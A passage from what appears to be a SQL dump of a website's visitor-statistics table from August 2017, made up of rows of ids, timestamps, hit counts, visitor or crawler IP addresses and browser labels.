,0,0,'51.255.65.85','other'),(149060,1503617009,1,1,0,0,'137.74.201.108','other'),(149061,1503617074,1,1,0,0,'217.69.133.5','other'),(149062,1503617509,3,3,0,0,'216.244.66.194','other'),(149063,1503617534,1,1,0,0,'51.255.65.56','other'),(149064,1503617681,1,1,0,0,'137.74.207.120','other'),(149065,1503617718,1,0,1,0,'66.249.76.109',''),(149066,1503617782,1,1,0,0,'217.182.132.72','other'),(149067,1503617866,5,5,0,0,'216.244.66.246','other'),(149068,1503618681,7,7,0,0,'216.244.66.194','other'),(149069,1503619457,1,1,0,0,'5.45.207.64','other'),(149070,1503619473,1,1,0,0,'141.8.142.21','other'),(149071,1503620298,1,1,0,0,'163.172.255.19','chrome'),(149072,1503620499,1,1,0,0,'141.8.183.5','other'),(149073,1503620854,1,1,0,0,'217.182.132.21','other'),(149074,1503620864,1,0,1,0,'66.249.66.155',''),(149075,1503620984,2,0,2,0,'66.249.76.109',''),(149076,1503621708,1,1,0,0,'217.182.132.35','other'),(149077,1503622124,1,1,0,0,'5.45.207.64','other'),(149078,1503622673,1,1,0,0,'217.182.132.190','other'),(149079,1503622934,1,1,0,0,'217.182.132.85','other'),(149080,1503623357,1,0,1,0,'66.249.76.108',''),(149081,1503623429,1,1,0,0,'40.77.167.44','other'),(149082,1503623444,1,1,0,0,'217.182.132.75','other'),(149083,1503624390,1,1,0,0,'95.24.35.242','chrome'),(149084,1503624516,1,1,0,0,'216.244.66.246','other'),(149085,1503624906,1,1,0,0,'141.8.142.21','other'),(149086,1503625173,1,0,1,0,'68.180.228.221',''),(149087,1503625213,1,1,0,0,'8.29.198.27','other'),(149088,1503625333,1,1,0,0,'51.255.71.101','other'),(149089,1503625524,1,1,0,0,'51.255.65.30','other'),(149090,1503625914,1,0,1,0,'66.249.76.91',''),(149091,1503626627,1,1,0,0,'178.154.200.7','other'),(149092,1503626734,1,1,0,0,'51.255.71.116','other'),(149093,1503626755,1,0,1,0,'66.249.66.157',''),(149094,1503626793,1,1,0,0,'217.182.132.34','other'),(149095,1503627104,4,4,0,0,'216.244.66.246','other'),(149096,1503627221,1,1,0,0,'51.255.65.85','other'),(149097,1503627376,1,1,0,0,'217.182.132.90','other'),(149098,1503627727,1,1,0,0,'51.255.71.130','other'),(149099,1503627736,1,1,0,0,'141.8.142.21','other'),(149100,1503627768,3,3,0,0,'91.209.11.236','other'),(149101,1503627974,4,4,0,0,'216.244.66.194','other'),(149102,1503628208,1,1,0,0,'66.249.76.93','chrome'),(149103,1503628373,1,1,0,0,'51.255.65.35','other'),(149104,1503628440,1,0,1,0,'68.180.228.221',''),(149105,1503628448,1,1,0,0,'217.182.132.17','other'),(149106,1503628743,1,0,1,0,'66.249.76.107',''),(149107,1503628796,7,7,0,0,'216.244.66.246','other'),(149108,1503629461,1,1,0,0,'217.182.132.68','other'),(149109,1503629494,1,1,0,0,'178.154.200.7','other'),(149110,1503629537,1,1,0,0,'141.8.183.1','other'),(149111,1503629854,1,1,0,0,'217.69.133.5','other'),(149112,1503630134,1,1,0,0,'217.182.132.56','other'),(149113,1503630270,1,0,1,0,'68.180.228.221',''),(149114,1503630486,1,1,0,0,'217.182.132.240','other'),(149115,1503630683,1,1,0,0,'217.182.132.74','other'),(149116,1503631424,1,1,0,0,'217.182.132.37','other'),(149117,1503631484,1,0,1,0,'68.180.228.221',''),(149118,1503632328,1,1,0,0,'217.182.132.15','other'),(149119,1503632684,1,1,0,0,'217.182.132.37','other'),(149120,1503632737,1,1,0,0,'51.255.65.15','other'),(149121,1503632890,3,3,0,0,'78.158.11.226','other'),(149122,1503634001,1,1,0,0,'141.8.142.45','other'),(149123,1503634313,1,1,0,0,'217.182.132.53','other'),(149124,1503634579,1,1,0,0,'137.74.207.119','other'),(149125,1503634647,1,1,0,0,'216.244.66.194','other'),(149126,1503635366,1,1,0,0,'176.31.231.10','other'),(149127,1503635454,1,1,0,0,'217.69.133.2','other'),(149128,1503635862,1,1,0,0,'217.182.132.27','other'),(149129,1503635983,1,1,0,0,'40.77.167.109','other'),(149130,1503636049,1,1,0,0,'8.29.198.25','other'),(149131,1503636889,1,1,0,0,'95.108.181.63','other'),(149132,1503636926,1,1,0,0,'91.209.11.236','other'),(149133,1503637110,1,1,0,0,'5.45.207.64','other'),(149134,1503637264,1,1,0,0,'91.196.178.65','firefox'),(149135,1503637685,1,1,0,0,'51.255.65.68','other'),(149136,1503638129,1,1,0,0,'51.255.65.36','other'),(149137,1503638189,4,4,0,0,'216.244.66.194','other'),(149138,1503638292,1,1,0,0,'51.255.71.117','other'),(149139,1503638475,1,1,0,0,'95.108.181.69','other'),(149140,1503638598,1,1,0,0,'51.255.65.37','other'),(149141,1503638696,1,1,0,0,'217.182.132.60','other'),(149142,1503638716,1,1,0,0,'217.182.132.150','other'),(149143,1503638939,1,1,0,0,'51.255.71.133','other'),(149144,1503639048,1,1,0,0,'91.209.11.236','other'),(149145,1503639192,1,1,0,0,'164.132.162.156','other'),(149146,1503639243,1,1,0,0,'217.182.132.5','other'),(149147,1503639882,1,0,1,0,'66.249.76.93',''),(149148,1503639977,1,0,1,0,'66.249.76.91',''),(149149,1503640386,1,1,0,0,'51.255.65.27','other'),(149150,1503640396,1,1,0,0,'51.255.65.41','other'),(149151,1503640466,1,1,0,0,'66.249.76.109','chrome'),(149152,1503640509,1,1,0,0,'51.255.65.24','other'),(149153,1503641018,1,1,0,0,'217.182.132.54','other'),(149154,1503641021,1,1,0,0,'51.255.64.106','other'),(149155,1503641336,1,1,0,0,'217.69.133.9','other'),(149156,1503641433,1,1,0,0,'180.76.15.13','other'),(149157,1503641502,1,1,0,0,'137.74.207.164','other'),(149158,1503641574,1,1,0,0,'146.185.223.114','firefox'),(149159,1503641743,1,1,0,0,'217.69.133.194','other'),(149160,1503641766,1,1,0,0,'217.69.133.4','other'),(149161,1503641943,1,1,0,0,'217.69.133.6','other'),(149162,1503642612,1,1,0,0,'217.182.132.151','other'),(149163,1503642696,1,1,0,0,'91.209.11.236','other'),(149164,1503643444,1,1,0,0,'141.8.183.1','other'),(149165,1503643882,1,1,0,0,'51.255.65.14','other'),(149166,1503644189,1,1,0,0,'91.209.11.236','other'),(149167,1503644489,1,1,0,0,'217.182.132.4','other'),(149168,1503644664,1,1,0,0,'216.244.66.246','other'),(149169,1503645343,1,1,0,0,'51.255.71.123','other'),(149170,1503645501,1,0,1,0,'66.249.76.93',''),(149171,1503645521,1,1,0,0,'217.182.132.182','other'),(149172,1503645859,1,1,0,0,'213.180.203.32','other'),(149173,1503645878,1,1,0,0,'83.149.126.98','other'),(149174,1503646087,1,1,0,0,'51.255.65.50','other'),(149175,1503646099,1,1,0,0,'51.255.65.34','other'),(149176,1503646585,1,0,1,0,'68.180.228.221',''),(149177,1503646890,1,1,0,0,'8.29.198.27','other'),(149178,1503647180,2,2,0,0,'216.244.66.194','other'),(149179,1503647202,1,1,0,0,'217.182.132.190','other'),(149180,1503647270,2,2,0,0,'217.69.133.4','other'),(149181,1503647331,1,1,0,0,'217.182.132.71','other'),(149182,1503647474,1,1,0,0,'137.74.207.120','other'),(149183,1503647693,4,4,0,0,'216.244.66.246','other'),(149184,1503647835,1,1,0,0,'217.182.132.181','other'),(149185,1503647966,1,0,1,0,'68.180.228.221',''),(149186,1503647984,1,0,1,0,'66.249.66.155',''),(149187,1503648043,1,1,0,0,'213.180.203.32','other'),(149188,1503648171,3,3,0,0,'216.244.66.194','other'),(149189,1503648415,36,36,0,0,'91.121.2.59','other'),(149190,1503648581,1,1,0,0,'141.8.183.1','other'),(149191,1503648660,3,3,0,0,'91.209.11.236','other'),(149192,1503648676,1,1,0,0,'95.108.181.63','other'),(149193,1503648846,4,4,0,0,'216.244.66.246','other'),(149194,1503649094,1,1,0,0,'217.182.132.69','other'),(149195,1503649108,1,1,0,0,'185.105.116.95','chrome'),(149196,1503649224,2,2,0,0,'217.182.132.7','other'),(149197,1503649406,1,1,0,0,'217.182.132.68','other'),(149198,1503650033,3,3,0,0,'91.209.11.236','other'),(149199,1503650222,1,1,0,0,'157.55.39.90','other'),(149200,1503650675,1,1,0,0,'207.46.13.28','other'),(149201,1503651817,1,1,0,0,'137.74.207.101','other'),(149202,1503652015,1,1,0,0,'91.209.11.236','other'),(149203,1503652418,2,2,0,0,'213.180.203.32','other'),(149204,1503652994,1,1,0,0,'217.182.132.52','other'),(149205,1503653108,1,1,0,0,'51.255.65.53','other'),(149206,1503653117,1,1,0,0,'217.182.132.177','other'),(149207,1503653493,1,1,0,0,'51.255.71.133','other'),(149208,1503653531,1,1,0,0,'51.255.65.24','other'),(149209,1503653588,1,1,0,0,'51.255.65.64','other'),(149210,1503653676,1,1,0,0,'51.255.65.8','other'),(149211,1503654586,1,1,0,0,'137.74.207.119','other'),(149212,1503655061,1,1,0,0,'217.182.132.78','other'),(149213,1503655082,3,3,0,0,'209.58.178.145','other'),(149214,1503655107,1,1,0,0,'94.178.112.17','chrome'),(149215,1503655675,1,1,0,0,'91.209.11.236','other'),(149216,1503656290,1,0,1,0,'68.180.228.221',''),(149217,1503657488,1,1,0,0,'141.8.183.5','other'),(149218,1503657654,10,10,0,0,'216.244.66.194','other'),(149219,1503657742,1,1,0,0,'8.29.198.26','other'),(149220,1503658737,10,10,0,0,'216.244.66.246','other'),(149221,1503658933,2,2,0,0,'95.108.181.69','other'),(149222,1503659089,1,1,0,0,'217.69.133.9','other'),(149223,1503660722,1,1,0,0,'51.255.71.110','other'),(149224,1503661155,1,1,0,0,'91.209.11.236','other'),(149225,1503661275,1,1,0,0,'217.182.132.58','other'),(149226,1503662323,2,2,0,0,'91.209.11.236','other'),(149227,1503663450,1,1,0,0,'95.108.181.69','other'),(149228,1503663578,1,1,0,0,'141.8.183.1','other'),(149229,1503663797,1,1,0,0,'40.77.167.109','other'),(149230,1503664263,1,1,0,0,'51.255.65.55','other'),(149231,1503664285,1,1,0,0,'51.255.65.36','other'),(149232,1503664308,1,1,0,0,'66.249.66.156','chrome'),(149233,1503664612,1,1,0,0,'40.77.167.44','other'),(149234,1503665218,1,1,0,0,'51.255.65.8','other'),(149235,1503665301,1,1,0,0,'178.154.200.7','other'),(149236,1503665485,1,1,0,0,'37.73.209.166','chrome'),(149237,1503665891,1,1,0,0,'157.55.39.90','other'),(149238,1503667819,5,5,0,0,'216.244.66.194','other'),(149239,1503668578,1,1,0,0,'8.29.198.26','other'),(149240,1503669233,1,1,0,0,'216.244.66.194','other'),(149241,1503670680,1,1,0,0,'163.172.255.19','chrome'),(149242,1503671287,1,1,0,0,'217.69.133.4','other'),(149243,1503671937,1,1,0,0,'95.108.181.63','other'),(149244,1503671947,1,1,0,0,'217.69.133.9','other'),(149245,1503672115,1,0,1,0,'66.249.76.107',''),(149246,1503672258,1,0,1,0,'66.249.76.108',''),(149247,1503672994,1,1,0,0,'5.45.207.32','other'),(149248,1503673278,1,1,0,0,'91.209.11.236','other'),(149249,1503674216,1,0,1,0,'66.249.76.108',''),(149250,1503674302,1,1,0,0,'216.244.66.194','other'),(149251,1503674329,1,1,0,0,'51.255.65.51','other'),(149252,1503675154,1,1,0,0,'51.255.71.125','other'),(149253,1503675515,1,1,0,0,'164.132.162.159','other'),(149254,1503675630,1,1,0,0,'51.255.65.31','other'),(149255,1503675691,1,1,0,0,'91.209.11.236','other'),(149256,1503676772,1,1,0,0,'216.244.66.194','other'),(149257,1503677242,1,1,0,0,'91.209.11.236','other'),(149258,1503677407,1,1,0,0,'51.255.65.51','other'),(149259,1503677856,1,1,0,0,'217.182.132.52','other'),(149260,1503678143,1,0,1,0,'68.180.228.221',''),(149261,1503678284,1,1,0,0,'217.182.132.17','other'),(149262,1503678590,2,2,0,0,'91.209.11.236','other'),(149263,1503679049,1,1,0,0,'217.182.132.147','other'),(149264,1503679414,1,1,0,0,'8.29.198.25','other'),(149265,1503679850,1,1,0,0,'216.244.66.246','other'),(149266,1503679940,1,1,0,0,'217.182.132.74','other'),(149267,1503680485,2,2,0,0,'91.209.11.236','other'),(149268,1503680538,1,1,0,0,'141.8.183.1','other'),(149269,1503680546,3,3,0,0,'216.244.66.194','other'),(149270,1503680672,1,1,0,0,'217.69.133.222','other'),(149271,1503680976,1,1,0,0,'95.108.181.63','other'),(149272,1503681002,1,1,0,0,'51.255.65.85','other'),(149273,1503681080,1,1,0,0,'51.255.65.37','other'),(149274,1503681084,1,1,0,0,'164.132.162.187','other'),(149275,1503681298,1,0,1,0,'68.180.228.221',''),(149276,1503681392,1,1,0,0,'51.255.65.83','other'),(149277,1503681797,1,1,0,0,'217.182.132.77','other'),(149278,1503682097,1,1,0,0,'137.74.207.170','other'),(149279,1503682407,2,2,0,0,'91.209.11.236','other'),(149280,1503682765,1,1,0,0,'37.9.113.195','other'),(149281,1503683129,1,1,0,0,'217.69.133.194','other'),(149282,1503685194,1,1,0,0,'216.244.66.246','other'),(149283,1503685550,2,2,0,0,'216.244.66.194','other'),(149284,1503687339,1,1,0,0,'216.244.66.194','other'),(149285,1503687635,1,1,0,0,'66.249.76.109','chrome'),(149286,1503687824,1,1,0,0,'141.8.183.5','other'),(149287,1503688176,1,1,0,0,'128.72.77.181','msie'),(149288,1503688178,1,1,0,0,'95.220.216.171','msie'),(149289,1503688977,7,7,0,0,'216.244.66.194','other'),(149290,1503689186,1,1,0,0,'62.210.157.129','other'),(149291,1503689477,1,1,0,0,'178.154.200.7','other'),(149292,1503690173,7,7,0,0,'216.244.66.194','other'),(149293,1503690253,1,1,0,0,'8.29.198.27','other'),(149294,1503690489,1,1,0,0,'40.77.167.109','other'),(149295,1503690588,1,1,0,0,'95.108.181.63','other'),(149296,1503690940,1,1,0,0,'185.105.88.240','firefox'),(149297,1503692863,5,5,0,0,'216.244.66.246','other'),(149298,1503693010,1,1,0,0,'141.8.142.21','other'),(149299,1503693125,1,1,0,0,'163.172.255.19','chrome'),(149300,1503694135,1,1,0,0,'213.180.203.32','other'),(149301,1503694161,1,1,0,0,'207.46.13.28','other'),(149302,1503694270,1,1,0,0,'51.255.65.13','other'),(149303,1503694394,1,1,0,0,'51.255.64.106','other'),(149304,1503695570,1,1,0,0,'157.55.39.90','other'),(149305,1503695678,1,1,0,0,'217.69.133.2','other'),(149306,1503695731,1,1,0,0,'51.255.65.19','other'),(149307,1503695802,1,1,0,0,'5.45.207.15','other'),(149308,1503696590,1,1,0,0,'217.182.132.183','other'),(149309,1503697303,1,1,0,0,'91.196.178.134','chrome'),(149310,1503697339,1,1,0,0,'51.255.65.78','other'),(149311,1503698032,4,4,0,0,'216.244.66.194','other'),(149312,1503698108,1,1,0,0,'217.182.132.70','other'),(149313,1503698289,1,1,0,0,'5.45.207.32','other'),(149314,1503698571,1,1,0,0,'95.108.181.63','other'),(149315,1503698894,1,1,0,0,'51.255.65.49','other'),(149316,1503699058,1,1,0,0,'213.180.203.32','other'),(149317,1503699331,1,1,0,0,'137.74.207.109','other'),(149318,1503699465,1,1,0,0,'51.255.65.56','other'),(149319,1503699786,1,1,0,0,'37.9.113.94','other'),(149320,1503700963,1,1,0,0,'91.196.178.134','chrome'),(149321,1503700978,1,0,1,0,'68.180.228.221',''),(149322,1503701089,1,1,0,0,'8.29.198.26','other'),(149323,1503701277,1,1,0,0,'137.74.203.194','other'),(149324,1503701360,1,1,0,0,'141.8.183.5','other'),(149325,1503701468,1,1,0,0,'217.182.132.241','other'),(149326,1503701646,2,2,0,0,'5.45.207.32','other'),(149327,1503701713,3,3,0,0,'216.244.66.194','other'),(149328,1503701979,1,1,0,0,'217.182.132.32','other'),(149329,1503702186,1,1,0,0,'180.76.15.24','other'),(149330,1503702477,1,1,0,0,'141.8.183.5','other'),(149331,1503702500,1,0,1,0,'66.249.76.109',''),(149332,1503702502,1,1,0,0,'5.255.253.4','other'),(149333,1503702627,1,1,0,0,'5.45.207.26','other'),(149334,1503702786,1,1,0,0,'37.9.113.94','other'),(149335,1503703031,1,1,0,0,'213.180.203.32','other'),(149336,1503703085,1,1,0,0,'51.255.65.81','other'),(149337,1503703726,1,1,0,0,'51.255.65.11','other'),(149338,1503703759,1,1,0,0,'51.255.71.120','other'),(149339,1503703941,3,3,0,0,'216.244.66.246','other'),(149340,1503704049,1,1,0,0,'217.182.132.151','other'),(149341,1503704263,1,1,0,0,'95.108.181.63','other'),(149342,1503704599,1,0,1,0,'66.249.66.155',''),(149343,1503704644,1,1,0,0,'5.45.207.42','other'),(149344,1503704719,1,1,0,0,'164.132.162.153','other'),(149345,1503705039,1,1,0,0,'51.255.65.20','other'),(149346,1503705967,1,1,0,0,'213.180.203.32','other'),(149347,1503706092,1,1,0,0,'216.244.66.194','other'),(149348,1503706564,1,1,0,0,'5.45.207.32','other'),(149349,1503706718,1,1,0,0,'37.9.113.94','other'),(149350,1503707036,1,1,0,0,'216.244.66.194','other'),(149351,1503707084,3,3,0,0,'216.244.66.246','other'),(149352,1503707221,1,1,0,0,'207.46.13.28','other'),(149353,1503707251,1,1,0,0,'37.9.113.163','other'),(149354,1503707291,1,0,1,0,'66.249.66.157',''),(149355,1503707374,1,1,0,0,'217.69.133.3','other'),(149356,1503707584,1,1,0,0,'141.8.142.43','other'),(149357,1503707588,1,1,0,0,'141.8.142.83','other'),(149358,1503707710,1,1,0,0,'217.182.132.54','other'),(149359,1503708010,1,1,0,0,'141.8.142.21','other'),(149360,1503708073,1,1,0,0,'37.9.113.94','other'),(149361,1503708395,1,1,0,0,'141.8.142.56','other'),(149362,1503708816,1,1,0,0,'216.244.66.194','other'),(149363,1503708931,1,1,0,0,'217.182.132.64','other'),(149364,1503709123,1,1,0,0,'51.255.65.31','other'),(149365,1503709124,1,1,0,0,'141.8.183.1','other'),(149366,1503709268,1,1,0,0,'178.154.200.27','other'),(149367,1503709282,1,1,0,0,'217.182.132.24','other'),(149368,1503709692,1,1,0,0,'141.8.142.45','other'),(149369,1503709902,1,1,0,0,'51.255.65.70','other'),(149370,1503710109,1,1,0,0,'213.180.203.32','other'),(149371,1503710225,1,1,0,0,'217.182.132.22','other'),(149372,1503710324,1,1,0,0,'37.9.113.163','other'),(149373,1503710931,3,3,0,0,'216.244.66.194','other'),(149374,1503710937,1,1,0,0,'141.8.142.45','other'),(149375,1503711667,1,1,0,0,'40.77.167.44','other'),(149376,1503711835,1,1,0,0,'217.182.132.147','other'),(149377,1503711922,1,1,0,0,'8.29.198.27','other'),(149378,1503712187,1,1,0,0,'51.255.65.35','other'),(149379,1503712852,1,1,0,0,'217.182.132.28','other'),(149380,1503712956,1,1,0,0,'164.132.162.164','other'),(149381,1503713051,5,5,0,0,'216.244.66.194','other'),(149382,1503713157,1,1,0,0,'51.255.71.123','other'),(149383,1503713421,1,1,0,0,'217.182.132.182','other'),(149384,1503713548,5,5,0,0,'216.244.66.246','other'),(149385,1503714159,1,0,1,0,'68.180.228.221',''),(149386,1503714239,1,1,0,0,'51.255.65.30','other'),(149387,1503714247,1,1,0,0,'176.31.231.10','other'),(149388,1503714758,1,1,0,0,'217.182.132.174','other'),(149389,1503715924,1,1,0,0,'51.255.65.71','other'),(149390,1503716729,1,1,0,0,'5.255.253.4','other'),(149391,1503716995,2,2,0,0,'216.244.66.194','other'),(149392,1503717120,1,1,0,0,'95.108.181.69','other'),(149393,1503717380,1,1,0,0,'51.255.65.65','other'),(149394,1503717451,1,1,0,0,'217.182.132.55','other'),(149395,1503717455,2,2,0,0,'5.45.207.64','other'),(149396,1503717903,1,1,0,0,'217.182.132.5','other'),(149397,1503718144,1,1,0,0,'217.182.132.59','other'),(149398,1503718260,1,1,0,0,'178.154.200.7','other'),(149399,1503718666,1,1,0,0,'51.255.71.130','other'),(149400,1503719377,1,1,0,0,'51.255.65.2','other'),(149401,1503720656,1,1,0,0,'141.8.142.21','other'),(149402,1503720711,1,1,0,0,'51.255.65.72','other'),(149403,1503721158,5,5,0,0,'216.244.66.246','other'),(149404,1503721291,7,7,0,0,'216.244.66.194','other'),(149405,1503721540,1,1,0,0,'51.255.71.119','other'),(149406,1503721694,1,1,0,0,'51.255.71.116','other'),(149407,1503722018,1,1,0,0,'51.255.65.53','other'),(149408,1503722083,1,1,0,0,'217.182.132.95','other'),(149409,1503722535,1,1,0,0,'217.182.132.71','other'),(149410,1503722761,1,1,0,0,'8.29.198.26','other'),(149411,1503723194,1,1,0,0,'216.244.66.194','other'),(149412,1503723423,1,1,0,0,'217.182.132.172','other'),(149413,1503723768,1,1,0,0,'137.74.207.116','other'),(149414,1503724003,1,1,0,0,'141.8.142.21','other'),(149415,1503724396,1,1,0,0,'91.209.11.236','other'),(149416,1503724470,2,2,0,0,'216.244.66.194','other'),(149417,1503724631,1,1,0,0,'137.74.207.114','other'),(149418,1503724672,1,1,0,0,'217.182.132.82','other'),(149419,1503725658,2,2,0,0,'91.209.11.236','other'),(149420,1503726203,1,1,0,0,'217.182.132.85','other'),(149421,1503726286,1,0,1,0,'66.249.76.109',''),(149422,1503726491,1,1,0,0,'217.182.132.78','other'),(149423,1503726561,1,1,0,0,'91.209.11.236','other'),(149424,1503726750,1,1,0,0,'95.108.181.63','other'),(149425,1503727261,1,1,0,0,'37.9.113.163','other'),(149426,1503728176,1,1,0,0,'217.182.132.68','other'),(149427,1503728246,1,0,1,0,'66.249.76.107',''),(149428,1503728567,1,1,0,0,'213.180.203.32','other'),(149429,1503728571,1,1,0,0,'141.8.183.1','other'),(149430,1503728794,7,7,0,0,'216.244.66.194','other'),(149431,1503729075,1,1,0,0,'217.182.132.175','other'),(149432,1503729346,1,0,1,0,'66.249.66.80',''),(149433,1503729405,2,2,0,0,'5.45.207.32','other'),(149434,1503729448,2,2,0,0,'91.209.11.236','other'),(149435,1503729863,1,1,0,0,'51.255.71.115','other'),(149436,1503729953,1,1,0,0,'137.74.207.110','other'),(149437,1503730039,1,1,0,0,'51.255.65.26','other'),(149438,1503730119,1,1,0,0,'51.255.65.224','other'),(149439,1503730128,1,0,1,0,'66.249.76.107',''),(149440,1503730466,1,0,1,0,'68.180.228.221',''),(149441,1503730541,2,0,2,0,'66.249.76.93',''),(149442,1503730653,1,1,0,0,'137.74.207.116','other'),(149443,1503730681,1,1,0,0,'37.9.113.138','other'),(149444,1503730960,1,1,0,0,'162.210.196.97','other'),(149445,1503731332,1,1,0,0,'54.165.59.7','other'),(149446,1503731458,4,4,0,0,'91.209.11.236','other'),(149447,1503731552,1,1,0,0,'178.154.200.7','other'),(149448,1503731690,2,2,0,0,'213.180.203.32','other'),(149449,1503732753,1,1,0,0,'178.154.200.7','other'),(149450,1503732815,3,3,0,0,'91.209.11.236','other'),(149451,1503732819,3,3,0,0,'216.244.66.194','other'),(149452,1503733278,4,4,0,0,'216.244.66.246','other'),(149453,1503733506,1,1,0,0,'180.76.15.9','other'),(149454,1503733598,1,1,0,0,'8.29.198.27','other'),(149455,1503734228,2,2,0,0,'66.249.83.221','chrome'),(149456,1503734322,1,1,0,0,'66.249.76.107','chrome'),(149457,1503734404,1,1,0,0,'216.244.66.194','other'),(149458,1503734878,1,1,0,0,'51.255.71.131','other'),(149459,1503735265,1,1,0,0,'91.209.11.236','other'),(149460,1503735383,1,1,0,0,'216.244.66.194','other'),(149461,1503736108,1,1,0,0,'157.55.39.90','other'),(149462,1503736317,1,1,0,0,'51.255.65.54','other'),(149463,1503736541,1,1,0,0,'217.182.132.178','other'),(149464,1503736760,1,1,0,0,'51.255.65.6','other'),(149465,1503736944,3,3,0,0,'91.209.11.236','other'),(149466,1503737217,1,1,0,0,'217.182.132.80','other'),(149467,1503737493,1,1,0,0,'107.167.109.171','other'),(149468,1503737601,1,1,0,0,'5.255.253.14','other'),(149469,1503737884,1,1,0,0,'40.77.167.109','other'),(149470,1503738035,1,1,0,0,'141.8.183.5','other'),(149471,1503738237,1,1,0,0,'91.196.178.136','chrome'),(149472,1503739436,1,1,0,0,'51.255.65.78','other'),(149473,1503739474,1,1,0,0,'217.182.132.74','other'),(149474,1503739547,1,0,1,0,'66.249.76.109',''),(149475,1503740013,1,1,0,0,'91.196.178.136','chrome'),(149476,1503740145,1,1,0,0,'137.74.207.159','other'),(149477,1503740293,1,0,1,0,'66.249.76.108',''),(149478,1503740414,1,1,0,0,'141.8.142.21','other'),(149479,1503740438,2,2,0,0,'46.4.97.116','other'),(149480,1503740677,1,0,1,0,'66.249.66.157',''),(149481,1503740701,1,1,0,0,'66.249.76.107','chrome'),(149482,1503740727,1,1,0,0,'157.55.39.90','other'),(149483,1503741019,1,1,0,0,'180.76.15.157','other'),(149484,1503741025,1,0,1,0,'66.249.76.89',''),(149485,1503741217,1,1,0,0,'217.182.132.20','other'),(149486,1503741823,1,1,0,0,'66.249.76.93','chrome'),(149487,1503742033,1,1,0,0,'91.196.178.38','chrome'),(149488,1503742388,1,0,1,0,'66.249.66.155',''),(149489,1503742771,1,1,0,0,'51.255.71.116','other'),(149490,1503742942,9,9,0,0,'108.12.37.82','other'),(149491,1503743278,1,1,0,0,'37.9.113.78','other'),(149492,1503743294,1,1,0,0,'145.130.252.149','firefox'),(149493,1503743311,1,1,0,0,'164.132.162.154','other'),(149494,1503743402,1,1,0,0,'217.182.132.150','other'),(149495,1503743587,2,0,2,0,'66.249.76.91',''),(149496,1503743811,3,3,0,0,'216.244.66.194','other'),(149497,1503744041,3,3,0,0,'216.244.66.246','other'),(149498,1503744425,1,1,0,0,'8.29.198.25','other'),(149499,1503744427,1,0,1,0,'66.249.76.108',''),(149500,1503744456,1,1,0,0,'66.249.66.155','chrome'),(149501,1503744938,1,1,0,0,'157.55.39.90','other'),(149502,1503744958,1,1,0,0,'217.182.132.55','other'),(149503,1503745097,1,1,0,0,'217.182.132.80','other'),(149504,1503745210,1,1,0,0,'217.182.132.75','other'),(149505,1503745608,3,3,0,0,'216.244.66.246','other'),(149506,1503745638,1,1,0,0,'51.255.65.73','other'),(149507,1503746166,1,1,0,0,'5.45.207.32','other'),(149508,1503746245,1,1,0,0,'51.255.65.57','other'),(149509,1503746507,1,0,1,0,'66.249.66.74',''),(149510,1503746928,1,1,0,0,'217.182.132.66','other'),(149511,1503747316,1,1,0,0,'51.255.71.115','other'),(149512,1503747447,1,1,0,0,'51.255.65.33','other'),(149513,1503747526,1,0,1,0,'66.249.76.107',''),(149514,1503747696,1,0,1,0,'66.249.66.155',''),(149515,1503747753,1,1,0,0,'137.74.207.161','other'),(149516,1503747787,1,0,1,0,'66.249.66.157',''),(149517,1503747944,1,1,0,0,'217.182.132.93','other'),(149518,1503748030,1,1,0,0,'217.182.132.157','other'),(149519,1503748451,1,1,0,0,'51.255.65.80','other'),(149520,1503748467,1,1,0,0,'66.102.9.25','chrome'),(149521,1503748681,1,1,0,0,'51.255.65.48','other'),(149522,1503748898,1,1,0,0,'66.249.66.75','chrome'),(149523,1503749228,1,1,0,0,'137.74.201.100','other'),(149524,1503749312,1,1,0,0,'217.182.132.35','other'),(149525,1503749616,1,1,0,0,'91.209.11.236','other'),(149526,1503749854,1,1,0,0,'216.244.66.194','other'),(149527,1503749961,2,0,2,0,'66.249.76.109',''),(149528,1503750314,1,1,0,0,'141.8.183.1','other'),(149529,1503750970,1,1,0,0,'217.182.132.85','other'),(149530,1503751039,1,1,0,0,'51.255.65.31','other'),(149531,1503751182,1,1,0,0,'216.244.66.194','other'),(149532,1503751582,1,1,0,0,'217.182.132.28','other'),(149533,1503752015,1,1,0,0,'51.255.71.127','other'),(149534,1503752085,1,1,0,0,'91.196.178.38','chrome'),(149535,1503752714,1,1,0,0,'217.182.132.7','other'),(149536,1503753061,1,1,0,0,'217.182.132.191','other'),(149537,1503753598,2,0,2,0,'66.249.76.91',''),(149538,1503753888,1,0,1,0,'66.249.66.156',''),(149539,1503754101,2,0,2,0,'66.249.66.155',''),(149540,1503754229,1,1,0,0,'217.182.132.150','other'),(149541,1503754653,1,1,0,0,'217.182.132.177','other'),(149542,1503754732,1,1,0,0,'51.255.65.42','other'),(149543,1503754794,3,3,0,0,'216.244.66.194','other'),(149544,1503754802,1,1,0,0,'51.255.65.72','other'),(149545,1503755141,1,1,0,0,'217.182.132.148','other'),(149546,1503755227,1,1,0,0,'217.182.132.97','other'),(149547,1503755243,1,1,0,0,'51.255.65.45','other'),(149548,1503755249,1,1,0,0,'8.29.198.27','other'),(149549,1503755592,1,1,0,0,'46.4.58.130','other'),(149550,1503755767,1,1,0,0,'180.76.15.148','other'),(149551,1503755961,1,1,0,0,'217.182.132.157','other'),(149552,1503756686,1,1,0,0,'51.255.65.53','other'),(149553,1503756732,1,1,0,0,'91.209.11.236','other'),(149554,1503756856,1,1,0,0,'217.182.132.18','other'),(149555,1503756985,1,1,0,0,'216.244.66.194','other'),(149556,1503757227,1,1,0,0,'217.182.132.151','other'),(149557,1503757381,1,1,0,0,'51.255.65.94','other'),(149558,1503757646,1,0,1,0,'66.249.66.76',''),(149559,1503758060,1,1,0,0,'5.45.207.42','other'),(149560,1503758458,1,0,1,0,'66.249.76.107',''),(149561,1503758651,1,1,0,0,'217.182.132.174','other'),(149562,1503758767,1,1,0,0,'91.209.11.236','other'),(149563,1503758883,1,0,1,0,'66.249.66.75',''),(149564,1503759237,1,1,0,0,'51.255.65.82','other'),(149565,1503759460,1,1,0,0,'51.255.65.64','other'),(149566,1503759946,1,1,0,0,'141.8.142.45','other'),(149567,1503759976,1,1,0,0,'137.74.207.116','other'),(149568,1503761079,1,0,1,0,'66.249.66.74',''),(149569,1503761166,1,1,0,0,'66.249.76.108','chrome'),(149570,1503761268,1,0,1,0,'66.249.66.157',''),(149571,1503761464,1,1,0,0,'176.15.228.86','chrome'),(149572,1503761760,1,1,0,0,'137.74.201.108','other'),(149573,1503762157,1,1,0,0,'51.255.65.58','other'),(149574,1503762289,2,2,0,0,'137.74.207.170','other'),(149575,1503762302,1,0,1,0,'66.249.66.155',''),(149576,1503762843,1,1